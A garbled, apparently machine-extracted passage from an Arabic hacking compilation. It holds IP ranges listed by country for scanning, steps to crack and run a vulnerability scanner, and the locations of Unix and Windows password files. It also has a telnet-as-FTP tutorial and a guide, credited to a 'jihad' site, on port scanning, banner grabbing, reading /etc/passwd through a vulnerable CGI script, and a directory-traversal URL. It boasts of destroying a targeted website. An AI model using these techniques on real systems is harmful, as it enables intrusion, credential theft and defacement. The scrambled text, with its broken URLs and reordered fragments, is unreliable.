‫‪<--------212.42.255----------------216.0.188.255--------------212.170.29.120.117.1‬المارات‬ ‫‪<-----------213.255<-------------209.255-----------------62.7.1‬أسرائيل‬ ‫‪<----------62.0.190.1‬أسرائيل‬ ‫‪ <------------212.187.109.58.113.195.1‬السعوديه‬ ‫‪ <----------212.com/a7lla1/superscan.116.2.200.25<-------------194.1‬عمان‬ ‫‪ <----------193.255---------------212.255<--------------212.40.255.255.58.255<--------------213.255<-----------195.238.255<-------------212.1‬البحرين‬ ‫‪183‬‬ .255<------------206.1‬قطر‬ ‫‪ <-----------206.227.1‬أسرائيل‬ ‫‪<---------128.8.72.102.29.1‬السعوديه‬ ‫‪ <-----------212.106.1.72.120.109.203.72.1‬قطر‬ ‫‪ <-----------206.1.3.1.80.114.7.1‬أسرائيل‬ ‫‪<-------192.236.116.82.88.255<-----------212.1.198.255<-------------212.zip‬‬ ‫خذوا هذه اليبات وبحثوا فيها شدوا حيلكم في اليبيات الولى‬ ‫‪<--------212.255.

safety-lab.exe‬‬ ‫الطريقة‪:‬‬ ‫========================================‬ ‫بعد تحميل البرنامج وتنزيله وعمل ‪ SetUp‬له‬ ‫افتح الكراك‬ ‫وبعد ذلك ستظهر هذه الصورة‪:‬‬ ‫‪184‬‬ .e3sar.‫انتهى‪،،،‬‬ ‫" شرح برنامج ‪ Shadow Scan Security‬لتحليل الموقع "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة ةةةةةة<‬ ‫نبذة بسيطة عن البرنامج‪:‬‬ ‫هذا البرنامج هو أكثر البرامج فعالية في اكتشاف الثغرات وأيضا المنافذ المفتوحة ف المواقع ولديه أعمال‬ ‫كثيرة لكني لن أتطرق إل لعملية واحدة فقط وهي شرح كيفية اكتشاف الثغرات في المواقع ومعرفة النطاقات‬ ‫المستخدمة لهذا الموقع وبالنسبة للخيارات الباقية لن أشرحها لنها سوف تأخذ وقت طويل لكني سوف أقسم‬ ‫شرحي لهذا البرنامج لقسام عدة وسوف أبدئها بالعظم وهو شرح لكيفية إخراج ثغرات الموقع والمنافذ‬ ‫الخاصة به والمواقع المسجل بها والمزيد من الوظائف‬ ‫أول تنزيل البرنامج وتنصيب الكراك ‪Shadow Scan Security‬‬ ‫مافيه أبسط منه‬ ‫حمل البرنامج من هذي الوصلة‬ ‫‪http://www.exe‬‬ ‫وبعد مايكتمل التحميل حمل الكراك من هنا‬ ‫‪http://www.35.net/almodammer/ShadowSecurityScanner5.com/SSS.

‫‪+++++++++++‬‬ ‫ٍ[]‪ ][1‬اضغط ليتم تنفيذ الكراك‬ ‫[]‪ ][2‬بعد إتمام عملية الكراك اضغط هنا للخروج‬ ‫========================================‬ ‫*****& شـــ البرنامج ـــرح &*****‬ ‫سوف أشرح باختصار ومن يصعب عليه الفهم أرجو أن يتقدم لي بالسؤال‬ ‫=)بعد تحميل البرنامج قم بفتحه من قائمة‬ ‫ابدأ ‪Start‬‬ ‫وابحث عنه ضمن البرامج‬ ‫بعد إيجاد البرنامج قم بفتح‬ ‫‪ShadowScanSecurity‬‬ ‫ليـأتي لك هذا(=‬ ‫الشكل ‪-1-‬‬ ‫أثناء الضغط على ‪Scanner‬‬ ‫الشكل‪-2-‬‬ ‫‪185‬‬ .

‫‪ =1‬إضافة سياسة جديدة والمقصود بها أيقونة أخرى وهي الرقم ‪ 4‬ولكن تحمل اسمك )ولداعي لن تنشأ‬ ‫باحث أو سياسة جديدة لك يكفيك الموجودة(‬ ‫‪ =2‬إعدادات لهذا الباحث وأيضا انا لأنصحك بتغيير شيء أبدا في هذا الخيار‬ ‫‪ =3‬حذف الموجه الجديد التي انت صممته والمقصود اليقونة التي تشبه رقم ‪ 4‬ولكن من تصميمك فبضغطك‬ ‫هنا سوف تحذفها‬ ‫‪ =4‬عليك تظليله وهو المربع الذي يوجد به خصائص البحث عن كل شيء‬ ‫‪ =5‬لرجوع للخلف ولأظن أن هناك رجوع لنها العملية والطار الول‬ ‫‪ =6‬اضغطها إذا أردت المتابعة‬ ‫‪ =7‬إزالة الطار‬ ‫الشكل‪-3-‬‬ ‫‪186‬‬ .

‫)‪ (1‬للرجوع إلى الشكل ‪-2-‬‬ ‫)‪ (2‬الذهاب إلى العملية التالية‬ ‫)‪ (3‬إلغاء إكمال العملية‬ ‫الشكل‪-4-‬‬ ‫‪ +1+‬إضافة موقع للبحث فيه‬ ‫‪ +2+‬إضافة أي بي من وإلى‬ ‫‪ + 3+‬تحميل من ملف سواء كان يحتوي على مواقع تريد البحث عنها او آي بيات‬ ‫‪ +4+‬عند إضافة موقع وبعد تحديده أثناء الضغط هنا سوف ينحذف‬ ‫‪ + 5+‬العودة والرجوع إلى الخلف أي‪ :‬الشكل‪-3-‬‬ ‫‪ + 6+‬إتمام العملية‬ ‫‪ + 7+‬إزالة والخروج من الطار إلى واجه البرنامج الرئيسية كباقي الزرار السابقة في الشكال السابقة‬ ‫الشكل‪-5-‬‬ ‫أثناء ضغط الزر ‪ Done‬وفي الخطوة السابقة سوف يظهر هذا المربع الكبير‬ ‫ومن هنا سوف نبدأ البحث عن الثغرات أنظر الشكل لتفصيل أكثر‬ ‫‪187‬‬ .

‫الشكل‪-6-‬‬ ‫بعد الضغط على ‪ Start Scan‬وذلك بتظليل الموقع والضغظ بزر الفأرة اليمين‬ ‫انتظر قليل بعد ضغطك لرقم ‪ 1‬في الشكل‪-5-‬‬ ‫وسوف يقوم البرنامج بالبحث في الموقع والمنافذ الخاصة به مع النطاقات كما هو موضح في هذا الشكل‬ ‫انتهى‪،،،‬‬ ‫" اماكن وجود ملف الباسورد في أنظمة التشغيل "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةة ةةةة<‬ ‫في نطم ليونكس‬ ‫‪etc/shadow/‬‬ ‫‪188‬‬ .

XP .winnt/repair/sam or sam/‬‬ ‫في الويندوز اكس بي البروفيشينال واصدارات الويسلر )) سيرفر ‪ -‬ادفانسد سيرفر ((‬ ‫لن تجد الويندوز في مجلد ‪WINNT‬‬ ‫ولكن سيكون كالويندوز العادي ‪.‫في نظم صن ميكروسيستيمز‬ ‫‪etc/shadow/‬‬ ‫في نظم ال ‪ BSD‬بصفه عامه‬ ‫‪etc/master.Windows‬‬ ‫انتهى‪،،،‬‬ ‫" اختراق الموقع )الجزء الول( "‬ ‫>ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة<‬ ‫‪189‬‬ .2000‬‬ ‫)) الملف المفعل بتشفير ‪(( LanMan‬‬ ‫‪winnt/system32/config/sam/‬‬ ‫))هذا الملف مغلق عادة ال عند القلع من النظام ول يسمح بفتحه او نسخه طالما النظام يعمل حتى ولو كان‬ ‫لديك صلحيات الدمنيستريتور ((‬ ‫))الملف الحتياطي ((‬ ‫‪_.passwd/‬‬ ‫في نظم السيليكون جرافيكس ‪ SGI‬المسمى ‪ARIX‬‬ ‫‪etc/shadow/‬‬ ‫نظام اي بي ام المسمى ‪AIX‬‬ ‫‪etc/security/shadow/‬‬ ‫نظم يونكس بصفه عامه ))اتش بي يو اكس ‪ )) -‬ترو يونكس ‪ )) 64‬خاص بالمنفريم ونظم الريسك ‪64‬‬ ‫وبعض منتجات اللفا (( (( ((‬ ‫‪etc/shadow/‬‬ ‫))اغلب هذه الصدارات تعتمد تشفير ‪ MD5‬القوي ((‬ ‫نظم ويندوز بصفه عامه )) ‪(( NT .

‬فلبد لك من استخدام وسيله اتصال )‪ (Telnet‬و لنفرض أنها الهاتف الذي‬ ‫لبد للرجل أن يضعه على أذنه )‪ (Daemon‬لكي يسمعك ‪ .Sources Code‬شفرة‬ ‫‪190‬‬ .‬‬ ‫‪ -2‬الخطوة التالية هي الولوج باستخدام اسم المستخدم ‪ Username‬و كلمة السر ‪ .‬‬ ‫ربما لصعوبة الموضوع و تشعبه ‪ .‬‬ ‫استخدام ‪ Telnet‬ك ‪FTP Client‬‬ ‫المنفذ الذي سيتم التصال عليه في حاله استخدامنا بروتوكول نقل الملفات ‪FileTransfer Protocol‬‬ ‫في الغالب سيكون ‪..Sources Code‬شفرة‬ ‫‪..com‬بالمنفذ ‪21‬‬ ‫و هذا ما سيظهر لك‬ ‫‪ .‬و الرقم الموجود في البداية يدل على نجاح التصال و هو‬ ‫رقم ثابت ‪. Password‬بما أن‬ ‫‪ zdnet‬تدعم المستخدم ‪ Anonymous‬سيتم استخدامه في الولوج للنظام كالتالي‪:‬‬ ‫ستكتب‬ ‫‪ .‬كما انه لبد لنا من أن نعرف أيضا أنه لبد من‬ ‫برنامج ‪ Daemon‬يتسمع على المنفذ المراد التصال عليه ‪.‬‬ ‫بدء التصال‬ ‫‪ -1‬قم بتشغيل ‪ Telnet‬و شبك على ‪ ftp..‬‬ ‫تشبيه من حياتنا العملية ‪ :‬نفترض أن هناك رجل في فرنسا )المستهدف( و أنت )المتصل( تريد إقامة حوار‬ ‫معه )وصله( و أنت في مصر ‪ .‬و انه لبد لنا من معرفة البروتوكول‬ ‫المستخدم في التصال حتى ننجح في الرسال و الستقبال ‪ ....l19-sj-zdnet.com NcFTPd Server (licensed copy) ready 220‬‬ ‫و السطر السابق يسمي ‪ Banner‬الخاص بال ‪ FTP Daemon‬المستخدم في موقع ‪ zdnet‬و هي‬ ‫تختلف باختلف الموقع الذي سيتم التشبيك عليه ‪ ... 21‬‬ ‫أين الصعوبة إذن ؟‬ ‫الصعوبة تكمن في أننا لكي نستخدم ‪ Telnet‬ك ‪ FTP Client‬يجب علينا اللمام بقدر كبير ببروتوكول‬ ‫‪!! FTP‬‬ ‫و لكن هذا لن يمنعني من عرض بعض المثلة لظهار كيفية التعامل مع هذا البروتوكول ‪.‬إذن فلبد لك من استخدام الفرنسية )البروتوكول المستخدم( حتى تتحدث )الرسال والستقبال( بحريه ‪.‫مقدمه ‪:‬‬ ‫مرت فترة طويلة منذ الدرس السابق ول اعرف لماذا مر كل هذا الوقت دون أن ابدأ في كتابة هذا الدرس ‪..‬‬ ‫مما سبق نستنتج أن ‪ Telnet‬هو مجرد وصله )مثل الهاتف( ‪ .zdnet..‬‬ ‫سأعيد تعريف ‪ Telnet‬من جديد و لكن بطريقه اكثر بساطه ‪.‬و لكن ها قد حان الوقت لمجابهة الصعوبة و التشعب و تقديم و لو حتى‬ ‫فكرة بسيطة عن هذا الموضوع الممتع ‪..zdnet.‬‬ ‫‪ Telnet‬هو برنامج يستخدم في إنشاء وصله بين جهازين ‪،‬و الجهاز المتصل يستخدم عنوان الجهاز‬ ‫المستهدف و رقم المنفذ ‪ Port‬الذي سيتم التصال عليه ‪،‬و الجهاز المستهدف )الخادم( يشغل برنامج آخر )‬ ‫‪ (Daemon‬يستمع على هذا المنفذ و تتم عمليه الرسال والستقبال باستخدام أحد البروتوكولت ‪.‬و لنفرض أيضا أن هذا الرجل ل يتحدث العربية‬ ‫‪ .

‬‬ ‫بعد أن تمت عمليه الولوج للنظام يجب إنشاء وصله لرسال واستقبال البيانات )قائمه بالملفات الموجودة أو‬ ‫الملفات ذاتها( ‪ .‬‬ ‫الثانية ‪ :‬تنشئ هذه الطريقة الوصلة بان يرسل الزبون المر ‪PASV‬‬ ‫‪191‬‬ .Guest login ok.‫‪user anonymous‬‬ ‫و سيستجيب الخادم بالتالي‬ ‫‪ ..‬إذن ما الذي كنا نفعله منذ قليل ؟!! ما قد فعلناه منذ قليل هو إنشاء وصله لرسال الوامر‬ ‫للنظام و استقبال استجابة النظام على الوامر ‪.Sources Code‬شفرة‬ ‫‪.‬و إذا لم ترد إعطاء بريدك فيمكنك أن تكتب أي شئ يأخذ شكل البريد )أي يحتوي على الرمز) @‬ ‫و سيستجيب الخادم بالتالي‬ ‫‪ .‬‬ ‫أنت الن قد قمت بالولوج إلى الخادم بنجاح ‪.You are user #552 of 2000 simultaneous users allowed-230‬‬ ‫‪-230‬‬ ‫‪.. send your complete e-mail address as password 331‬‬ ‫ثم تكتب أنت التالي‬ ‫‪ ..‬إل في الرقم في بداية كل سطر ‪..Sources Code‬شفرة‬ ‫‪.‬‬ ‫و لكي ننشئ تلك الوصلة ‪،‬هناك طريقتين‬ ‫الولي ‪ :‬تنشئ هذه الطريقة الوصلة بان يرسل الزبون )أنت( رقم ‪ IP‬الخاص به و المنفذ المفتوح الذي‬ ‫يستطيع الخادم استخدامه في إرسال البيانات ‪.‬‬ ‫و لكن تلك الطريقة تتطلب منك فتح أحد المنافذ على جهازك و هذا سيتطلب برنامج خاص لفتح هذا المنفذ ‪..Sources Code‬شفرة‬ ‫‪pass @zorro‬‬ ‫و بالطبع عند الولوج بالمستخدم ‪ Anonymous‬تقوم بإعطاء عنوان البريد اللكتروني الخاص بك ككلمة‬ ‫السر ‪ .Logged in anonymously 230‬‬ ‫و بالطبع تلك الستجابه قد تختلف من موقع لخر ‪ .‬‬ ‫و لذلك لن نستخدم تلك الطريقة ‪.

189.Sources Code‬شفرة‬ ‫‪LIST‬‬ ‫سيستجيب الخادم بالتالي في النافذة الولى أيضا‬ ‫‪ ..Sources Code‬شفرة‬ ‫‪(Entering Passive Mode (207.‬‬ ‫مثال‬ ‫‪ .69.‬‬ ‫أول أربع مجموعات )من اليسار( هو ال ‪ IP‬الخاص بالخادم و في هذه الحالة يكون ‪.‫‪ .61.Sources Code‬شفرة‬ ‫‪.‬‬ ‫مثال‬ ‫عندما ترسل المر ‪( LIST‬يستخدم لعرض محتويات الدليل( في النافذة الولى‬ ‫‪ . 3113‬‬ ‫إذن عندما تريد أن ترسل أحد الوامر سترسله من النافذة الولى و النافذة الثانية ستظهر بها البيانات ‪..12...Sources Code‬شفرة‬ ‫‪PASV‬‬ ‫و سيرد الخادم برقم ‪ IP‬الخاص به و المنفذ المفتوح )على الخادم بالطبع( الذي يستطيع الزبون )أنت(‬ ‫التصال عليه ‪.41 227‬‬ ‫و الرقم الطويل الموجود بين القواس تفسيره كالتالي ‪.. Transfer starting 125‬‬ ‫‪192‬‬ .com‬بالمنفذ‬ ‫‪.zdnet.189..Data connection already open.61‬‬ ‫أما الرقمان التاليان فيمثلن رقم المنفذ و يتم حسابه كالتالي‬ ‫‪3113 = 41 + 256 × 12‬‬ ‫و لذلك فالخطوة التالية التي يجب على الزبون اتباعها هي فتح وصله جديده مع الخادم على المنفذ ‪. 3113‬‬ ‫ولكي تقوم بمثل هذا المر يتوجب عليك فتح نافذة ‪ Telnet‬جديده و تشبك على ‪ ftp. 207.69.

.‬‬ ‫إلى هنا و أظن أنني قد تماديت ‪ .‬‬ ‫انتهى‪،،،‬‬ ‫" اختراق المواقع )الجزء الثاني( "‬ ‫> منقول من موقع الجهاد<‬ ‫>الكاتب‪ :‬الكندور<‬ ‫‪193‬‬ .vbip.ohio-state.asp‬‬ ‫)ينصح به بشده(‬ ‫‪) http://www. PASV‬ثم تنشئ اتصال جديدا بعد حساب رقم المنفذ باتباع الخطوات السابقة ‪.‬أل أستطيع بدل من كل هذا الهراء أن استخدم برنامج جاهز مثل ‪ CuteFTP‬؟!!‬‫بالطبع تستطيع و لكن لن يضرك أن تعلم شيئا عن البروتوكول الذي تستخدمه و ربما بعد تعلم البروتوكول‬ ‫تستطيع أن تصنع برنامجك الخاص‬ ‫ اقرأ الدرس مره و مرتين حتى تستوعب الفكرة تماما ثم اسأل فيما شئت‬‫ لتعلم اكثر عن هذا الموضوع قم بزيارة المواقع التالية‬‫‪http://www..com/winsock/winsock_ftp_ref_01.cis.html‬لمن اراد التعمق في‬ ‫البروتوكول(‪.edu/htbin/rfc/rfc0959.‬و لكنني لم استطع أن امنع نفسي من مشاركتكم بهذا الموضوع الممتع‬ ‫)ممتع بالنسبة إلي( ‪.‬‬ ‫و هكذا كلما أردت أن ترسل أمر عرض محتويات دليل ما أو استقبال أو إرسال ملف ما ‪ ،‬يجب أن تبدأ بأمر‬ ‫‪ .com/winsock/winsock_ftp_01.‫و ستظهر محتويات الدليل في النافذة الثانية ثم سيتم غلق التصال في النافذة الثانية بمجرد إتمام عرض‬ ‫محتويات الدليل ‪.‬‬ ‫ملحظات هامة‬ ‫ لربما تتساءل الن ‪ .htm‬ينصح به بشده(‬ ‫‪) http://www.vbip..

org/nmap‬وهي تعمل على نظام ليونكس ‪،‬‬ ‫إذا أردت برنامج يعمل على ويندوز انصحك بـ ‪ ، SuperScan‬عليك البحث عنها في النترنت ‪ ،‬سوف تجد‬ ‫آلف المواقع التي تقدمها لتنزيل ‪ ،‬ومن الممكن أن تستخدم نصوص ‪ Perl‬لعمليه البحث ‪ ،‬لغه ‪Perl‬‬ ‫أصبحت اللغه محبوبه لدى جميع الهاكر بعد ‪C‬‬ ‫بعد الحصول على النتائج ‪ ،‬مثل نصلح تجربه على الموقع ‪ ( /http://www.7lem.25 .37 .com‬‬ ‫‪194‬‬ .‫الختراق ‪:‬‬ ‫~~~~~~~~~‬ ‫ المقدمة ‪.21‬ويوجد منافذ‬ ‫أخرى لكن لن نهتم لها هنا ‪ ،‬نقوم بعمليه نزع التواقيع للمنافذ‪.23 .7lem.inscure.110 .22 .‬‬‫ كيف أجمع معلومات حول الموقع ؟‬‫ كيف يتم كشف نقاط الضعف ؟‬‫ كيف يمكن إستغلل نقاط الضعف المكتشفه ؟‬‫ ماهو ملف كلمة المرور ‪ password file‬؟‬‫ بماذا يفيدني هذا الملف ؟‬‫ كيف يمكن معرفة كلمة السر من خلل ملف الباسورد ‪ password file‬؟‬‫ ماالفرق بين إذا كان الملف )مشفر ‪ (encryption‬وإذا كان )مضلل ‪ (shadowed‬؟‬‫ وماذا لو كان ملف كلمة المرور مشفر ‪ ،‬كيف يتم كسره ؟‬‫‪ -‬ولو كان ملف كلمة المرور مضلل ‪ ،‬ماذا علي ان أعمل ؟‬ ‫المقدمة ‪-:‬‬ ‫~~~~~~~~~‬ ‫أعد هذا المستند للباحثين وليس لمن أراد أن يخترق موقع فقط ! أنا أعتبر أن لديك الخبره اللزمه لفهم كل ما‬ ‫أتحدث عنه ‪ ،‬ل تتوقع إني بقول لك نزل برنامج ) مثل ‪ ( Void Eye‬أو غيره وحط لك في هذا المستند‬ ‫شرح بالصور وقول لك إخترق مواقع ‪ ،‬العمل المقزز هذا لن نتطرق له أبدًا‬ ‫ كيف أجمع معلومات حول موقع ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫أول خطوه تصلحها هي بورت سكان ‪ ،‬أنصحك تستخدم ‪ nmap‬المشهوره والقواء على الطلق‪،‬يمكن أن‬ ‫تبحث عنها هذا إذا ما لقيتها في الموقع ‪ www..‬‬ ‫ماهي عمليه نزع التواقيع للمنافذ؟‬ ‫من المعروف أن المنفذ فتح من قبل تطبيق ‪ ،‬عند التصال بهذا المنفذ فسوف يتم إرجاع رد اليك ‪ ،‬مثل لو‬ ‫إتصلت بالبورت ‪ 23‬وهو لتلنت ‪ ،‬وموقع ‪ /http://www.com‬بعض برامج‬ ‫البحث تطلب وضع رقم الي بي للموقع ‪ ،‬ولتقبل الدوماين عندها إستخدم ‪ ping‬لتعرف رقم الي بي(‬ ‫تأتي النتائج ‪ ،‬البورتات )‪ (587 .514 .513 .7lem.com‬توجد به خدمه تلنت ‪ ،‬ويتضح هذا‬ ‫من عمليه مسح المنافذ ‪،‬التصال بخدمه اتلنت‬ ‫‪/telnet http://www..143 .

7elm..‬الخ ‪ ،‬عليك أن تستخدم ‪ queso‬الداة المفضله لكشف نظام التشغيل ‪ ،‬وهي تعمل على ليونكس ‪،‬‬ ‫لستخدامها عليك كتابه‬ ‫‪/queso http://www.7lem.login :‬‬ ‫يتضح بأن السيرفر يعمل على نظام ‪، SunOS 5. info‬الخ ( أو أدرت معرفه الـ ‪ DNS‬الولي والثانوي للموقع ‪ ،‬أو من هو الشخص‬ ‫اللي سجل ومعلومات عنه وما هي الشركه التي تستظيف الموقع ‪ ،‬عليك بإستخدام خدمه ‪ ، whois‬تستطيع‬ ‫إستخدام خدمه ‪ whois‬وتطلب معلومات من قواعد بيانات ‪ whois‬عن طريق أمر ‪ whois‬في لينكس ‪،‬‬ ‫أكتب ‪ man whois‬لمزيد من المعلومات ‪ ،‬إذا كنت تستخدم ويندوز أو أي بيئه أخرى أنصحك بالتوجه الى‬ ‫برمجيات السي جي آي المتواجد في الموقع‬ ‫‪195‬‬ .‬‬ ‫من المعروف من عمليه السكان بورت بأن البورتين ‪ 110‬و ‪ 25‬مفتوحين ‪ ،‬هذا يدل على أن في الموقع‬ ‫خدمة البريد اللكتروني ‪ ،‬بالطبع هذا يفيدك لمعرفه ‪ smtp‬و ‪ pop‬للموقع ‪ ،‬كل ماعليك فعله هو كتابه المر‬ ‫التالي )في ‪( Linux‬‬ ‫‪host 7lem.7‬بقي عليك أن تنتزع التواقيع من البورتات المتبقيه‬ ‫لتعرف ما هو التطبيق وإصدارته المنصت لها )إستخدم التلنت ( ‪ ،‬وثم تقوم ببحث عن نقاط ضعف لها‬ ‫وتحصل على شيفرات الستثمار الخاصه بها ‪ ،‬الخطوه التاليه هي أن تعرف ما هو ملقم الويب الذي يعمل‬ ‫على هذا النظام ‪ ،‬نذهب الى الترمينال تبع ليونكس ونكتب‬ ‫‪nc http://www.com‬‬ ‫كل ماعليك بعد تثبيت الداة في جهازك هو كتابه ‪ queso‬وثم مسافه والموقع ورقم البورت ‪ 80‬والذي هو‬ ‫بطبيعه الحال مفتوح في جميع المواقع‪.* Server‬‬ ‫‪.com/ 80‬‬ ‫‪---------------------‬‬‫‪.‬‬ ‫‪..com‬مثل ) ‪ support‬أو‬ ‫‪ webmaster‬أو ‪.3..‬يأتيك الرد بأن النظام ‪SunOS 5..‬‬ ‫‪---------------------‬‬‫أختصرت النتيجه وتم تضليل إصدار ملقم الويب وذلك لحمايه الموقع ‪ ،‬اتمنى أن تستطيع كشفه بنفسك‪.7‬‬ ‫‪---------------------.‬هذا المستند ل يختص بـ‬ ‫‪ Linux‬لذلك لن أذكرها ‪ ،‬تأتي نتيجه التصال بسيرفر الحلم على بورت التلنت‬ ‫‪---------------------‬‬‫‪SunOS 5...com‬‬ ‫وأنتظر النتائج‬ ‫ملحظه ‪ -:‬إذا كنت تعيش مع بن لدن ولست عائش في جو تقنيه معلومات كل ما عليك فعله هو تفجيراليميل‬ ‫)على حسب ما يسمياها كثير من الناس(‬ ‫ملحظه ثانيه ‪ -:‬إذا لم تجد في السيرفر خدمه تلنت أو أنه تم تغيير التوقيع عن طريق مثل قرصنه‬ ‫النظام ‪..‬‬ ‫‪Apache/1.‬‬ ‫‪...‫يتم تنفيذ المر التالي في ‪ Windows‬و ‪ Linux‬و ‪ SunOS‬و ‪ FreeBSD‬و ‪ QNX‬بنفس الصيغه ‪،‬‬ ‫ولكن أفضل ‪ Linux‬عنها ‪ ،‬وهو لن لينكس يوفر كل ماتحتاجه من أدوات ‪..condor..‬‬ ‫‪.7‬‬ ‫لو أردت مثل قائمة بالبريدات الموجوده في موقع ‪ /http://www.

.1.passwd‬لتشغل بالك الن بما تعنيه كلمة مضلله ومافائده هذا الملف ‪.com/search?q=whois&btnG=Google+Search‬‬ ‫ كيف يتم كشف نقاط الضعف ؟‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫ل تستخدم برامج مثل ‪ void eye‬أو ‪ ShadowSecurityScaner‬هذه للمغفلين فقط!!‪ ،‬المحترفين‬ ‫واللي يبغا يكون محترف ل يستخدم برامج في عمليات الختراق ‪ ،‬ول يخترق لمجرد أنه يبغا يخترق ‪ ،‬عمليه‬ ‫إختراق سيرفر تمتاز بالدقه المتناهيه ‪ ،‬والتخطيط المحكم ‪ ،‬وكل عمليات السطو المحكمه هي التي يصعب‬ ‫إكتشاف مرتكبيها ‪ ،‬لكن وال لو كنت من اللي يشغل برنامج ومايدري ال وين حاطه فصدقني إنك ماراح تفلح‬ ‫طول عمرك ‪ ،‬هذا لو قدرت تخترق شئ ‪ ،‬فلو حدث وتم الختراق بواحد من هذه البرامج فسوف تصطاد‬ ‫بسناره تماما كالسمكه‬ ‫نقاط الضعف المفضله والتي تعتبر كأسرار ول يكشف عنها ال بعد فتره طويله هي التي في ملقم الويب مثل‬ ‫‪ Apache‬أو ‪ ، IIS‬وكذلك نقاط الضعف الموجوده في سكربتات ‪ CGI‬و ‪ Perl‬و ‪ ، PHP‬أو التي قد‬ ‫تكون موجوده في البرنامج المستخدم لتفسير نصوص البيرل أو السي جي آي ‪ ،‬وإذا كان في الموقع برنامج‬ ‫لتسوق مثل من الممكن أن تستغل فيه نقطه ضعف هذا إذا وجدت به ‪ ،‬يعني اي شئ في السيرفر سوى كان‬ ‫سكربت بيرل أو سي جي آي‪..‬إستمر في القراءة فقط‬ ‫‪++++++++++++++++++++++++‬‬ ‫الجزء الثاني‬ ‫} ‪ { http://www.7b‬تركنا المنتدى ورحنا‬ ‫ندور على شئ ثاني ‪ ،‬فتحت السورس تبع الصفحه وبحثت عن ‪ cgi‬و ‪ ، pl‬وجدنا سكريبت ثاني ‪ ،‬علبة‬ ‫توصيت ‪ ،‬نبحث عن نقاط ضعف لها ‪ ،‬ل شئ تماما ‪ ،‬نكمل البحث عن السكريبتات ‪ ،‬وأخيرا وعندما وصل‬ ‫التحميل للغنيه عند ‪ % 80‬كنت قد توصلت لنقطه ضعف في سكريبت ‪ cgi‬خاص لعداد الزوار ‪ ،‬تمكنك من‬ ‫عرض أي ملف في السيرفر ‪ ،‬طلبت الملف ‪ etc/passwd‬وطبعا كلمة المرور المسجله في المف كانت‬ ‫مضلله والنظام كان هو ‪ FreeBSD‬يعني كلمة المرور تكون في نفس الدليل ولكن في ملف ثاني وهوالملف‬ ‫‪ shadow‬أو ‪ ، master.google.1.‬أو كان برنامج تنفيدي أو حتى نظام التشغيل أو ملقم الويب مصاب بنقطه‬ ‫ضعف من الممكن أن يعرض السيرفر للختراق ويعرض كل ما بداخله من أسرار الى المخترق ‪ ،‬سأختار لكم‬ ‫حادثه مره معي‬ ‫‪ ،‬عداد زورا‬ ‫‪ counter‬عرض موقع‬ ‫‪ mp3‬مشهور للختراق في أي لحظه ‪ ،‬أول مادخلت الموقع ونزلت أغنيه ‪ Don't Tell Me‬في الوقت‬ ‫اللي كانت الغنيه تنزل فيه حبيت أشوف الموقع وأضيع وقت الى أن ينتهي التحميل ‪ ،‬ما كنت أتوقع أني‬ ‫بلقي نقاط ضعف فيه ‪ ،‬فتحت التلنت‬ ‫وشبكت على كم بورت معروف مثل ‪ 25‬و ‪ 23‬و ‪ 21‬و ‪ 110‬الخ ‪ ،‬دخلت منتدى في الموقع واخذت إسم‬ ‫المنتدى ‪ Ikonboard v2.‬‬ ‫‪196‬‬ ...org/tools/index.‬كل‬ ‫هذا ستعرفه قريبا ‪.html‬‬ ‫توفر لك هذه الصفحه مجموعه من برمجيات السي جي آي التي تسهل لك المهمه ‪ ،‬هناك رياضيات لطلب‬ ‫معلومات عن موقع ويب بإستخدام ‪ whois‬وهي مفيده جدا ‪ ،‬على كل حال توجه الى الموقع التالي لمزيد‬ ‫من التفاصيل‬ ‫‪http://www.cgi‬هذا ‪ ، CGI‬ل‬ ‫تستغرب ‪ ،‬هذه هي الحركات الجديده لنشر ال نكمل الموضوع ‪.1..8b‬وليس ‪ ، Ikonboard v2.de/cgibin/nph-%20%20%20%20%20.fbunet.psyon..‫‪http://www.8b‬توجهة الى كم موقع وبحثت فيها بسرعه عن نقاط ضعف المنتدى ‪ ،‬ولكن‬ ‫كانت نقاط الضعف لـ ‪ Ikonboard v2..

/...././....‬الخ‬ ‫‪ -3‬عمل جلسه للتقاط كل السكربتات ) ‪ ( Perl ./././...com‬هذا موقع يستحق التدمير ‪ ،‬وقد تم ذلك ‪ ،‬وهو الن تم إرجاعه ولكن‬ ‫من جديد ول يحوي ال القليل من الصفحات ل تتجاوز إثنتان‬ ‫سمعت عن هذا الموقع في أحد منتديات الهاكرز النجليزيه بأنه يقدم خدمه ل أعلم ما هي بالضبط ‪ ،‬فذهبت‬ ‫للموقع لسجل واعرف ماهي ‪ ،‬كان التسجيل عن طريق إرسال معلومات الى بريد اللكتروني ارسلت‬ ‫معلومات ‪ ،‬وصلني الرد بعد ساعتين تقريبا ‪ ،‬كا كنت أن الرد يكون كله حش وسب ‪ ،‬ما كنت أقراء ال كلم‬ ‫كله حش وسب ‪ ،‬ليش ‪ ،‬تبين لي السبب هو ذكري كلمة ‪ ، i'm from saudi arabia‬ولكن لماذا كل هذا‬ ‫الحقد ‪ ،‬ومضت ايام وكل يوم والثاني أحقد عليه أكثر وأكثر عشان عنصريته ‪ ،‬ال أن توفقنا ولقينا لملقم‬ ‫الويب حقه نقطه ضعف في موقعي روسي ‪ ،‬وال الن غير مرقوعه ‪ ،‬تقدر تعرض كل الملفات الموجوده في‬ ‫السيرفر ‪ ،‬وتقدر تسحب منها كل ماتريد ‪ ،‬عن طريق اليو آر إل هذا‬ ‫عنوان الموقع وثم ‪ /./.com‬‬ ‫نوع آخر ‪ ،‬يكون الستثمار )من الن سوف نطلق إسم إستثمار على الطريقه التي تستغل بها الثغره( يكون‬ ‫الستثمار على شكل شفره )كود( مكتوب ببرنامج ‪ sh‬في ليونكس ‪ ،‬وهو ما يسمى بالعربي برنامج الغلف‬ ‫وبالنجليزي ‪ shell‬وتكون هذه الشفره تحت ملف بالمتداد *‪ sh..../.‫ما قلت هذا موقع يهودي وال بدمره وصلح عليهم عنتر ولد بو شداد ‪ ،‬أرسلت رساله لنقطه الضعف ‪،‬‬ ‫صلحت لها نسخ ولصق ‪ ،‬ورد علي بالشكر وقائمه بالغاني الجديده لديهم وأخذ فكره حسنه عن المسلمين‬ ‫وعن العرب بدل من فكره الرهاب اللي حكوماتهم تزرعها في عقولهم‬ ‫لنأخذ مثال ‪ :‬الموقع ‪ timduff./‬أو حتى من الممكن أن تضع بعد عنوان‬ 